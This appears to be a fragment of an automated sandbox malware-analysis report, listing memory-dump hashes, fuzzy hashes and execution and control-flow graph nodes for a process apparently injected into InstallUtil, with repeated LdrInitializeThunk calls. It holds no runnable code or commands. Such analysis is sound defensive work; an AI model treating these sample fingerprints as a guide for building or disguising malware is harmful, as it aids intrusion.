                                                                                                                                  • Opcode ID: a8de4524a73dde40fc1464fa3c10db74567fc826975e29979b17c977057bf73b
                                                                                                                                  • Instruction ID: fc0a37d66e711b92a7e0ef12a8bcdfd9c397f2f67e7e374a227797a584d6e7c0
                                                                                                                                  • Opcode Fuzzy Hash: a8de4524a73dde40fc1464fa3c10db74567fc826975e29979b17c977057bf73b
                                                                                                                                  • Instruction Fuzzy Hash: 94C00276E5001A9A8B00DAD9E4508DCB774EB94321B004066E224A6104D63015268B50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d9ad763473169c0641f8fa6fbe64d159337e2fdf64f1f53f72e9cce82648aafd
                                                                                                                                  • Instruction ID: 8121da8859fbc121f4068de59a4876f2a47a4e76a9100f80576882e98a3d6068
                                                                                                                                  • Opcode Fuzzy Hash: d9ad763473169c0641f8fa6fbe64d159337e2fdf64f1f53f72e9cce82648aafd
                                                                                                                                  • Instruction Fuzzy Hash: 1DC08C30100209CFF300AF50D855B2D3A32FBC2329F10211C6002AB684CB745C45AB60
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                                                                                                  • API String ID: 0-463314800
                                                                                                                                  • Opcode ID: 9a4885a5a3943fe386faedd0bc6c0de383f6ebe01d440c8b431bf9b4f556eb58
                                                                                                                                  • Instruction ID: 556da0b454b724fef186cba3336a05fb1ab76f5f3d96781ed92ca70c02f05258
                                                                                                                                  • Opcode Fuzzy Hash: 9a4885a5a3943fe386faedd0bc6c0de383f6ebe01d440c8b431bf9b4f556eb58
                                                                                                                                  • Instruction Fuzzy Hash: 03D18032A00219DFCB49DF58D940E99BBB7FF88310F0544A8E609AB276C735ED55DB90

Execution Graph

Execution Coverage:19.6%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:0%
Total number of Nodes:28
Total number of Limit Nodes:2
                                                                                                                                  execution_graph 8910 be46d8 8911 be46e4 8910->8911 8914 be48c9 8911->8914 8915 be48e4 8914->8915 8919 be4ef8 8915->8919 8924 be4f08 8915->8924 8916 be4713 8920 be4f2a 8919->8920 8921 be4ff6 8920->8921 8929 bec76c 8920->8929 8935 bec168 8920->8935 8921->8916 8925 be4f2a 8924->8925 8926 be4ff6 8925->8926 8927 bec76c 2 API calls 8925->8927 8928 bec168 LdrInitializeThunk 8925->8928 8926->8916 8927->8926 8928->8926 8930 bec623 8929->8930 8931 bec764 LdrInitializeThunk 8930->8931 8934 bec168 LdrInitializeThunk 8930->8934 8933 bec8c1 8931->8933 8933->8921 8934->8930 8936 bec17f 8935->8936 8937 bec17a 8935->8937 8936->8937 8938 bec8a9 LdrInitializeThunk 8936->8938 8937->8921 8938->8937 8939 becab0 8940 becadd 8939->8940 8941 bec168 LdrInitializeThunk 8940->8941 8942 bee9bf 8940->8942 8944 becde6 8940->8944 8941->8944 8943 bec168 LdrInitializeThunk 8943->8944 8944->8942 8944->8943

                                                                                                                                  Control-flow Graph

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.3285147470.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_be0000_InstallUtil.jbxd

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • LdrInitializeThunk.NTDLL(00000000), ref: 00BEC8AE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.3285147470.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_be0000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.3284698318.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_b9d000_InstallUtil.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.3284698318.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_b9d000_InstallUtil.jbxd